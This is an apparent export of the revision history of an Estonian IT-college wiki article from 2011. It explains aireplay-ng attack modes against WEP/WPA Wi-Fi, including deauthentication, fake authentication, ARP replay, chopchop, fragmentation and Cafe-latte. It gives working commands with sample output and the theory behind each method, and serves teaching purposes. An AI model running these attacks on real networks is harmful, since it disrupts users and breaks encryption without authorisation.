&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
Waiting for a data packet...&lt;br /&gt;
Read 96 packets...&lt;br /&gt;
&lt;br /&gt;
      Size: 120, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
&lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
      Source MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
&lt;br /&gt;
      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.&lt;br /&gt;
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.&lt;br /&gt;
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....&#039;.. 0.&lt;br /&gt;
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W&#039;.l....&lt;br /&gt;
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&amp;amp;.9W.)..&lt;br /&gt;
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....&amp;lt;R.&lt;br /&gt;
      0x0070:  0505 933f af2f 740e                      ...?./t.&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0001-123456.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32794</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32794"/>
		<updated>2011-05-24T19:21:07Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Teooria */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
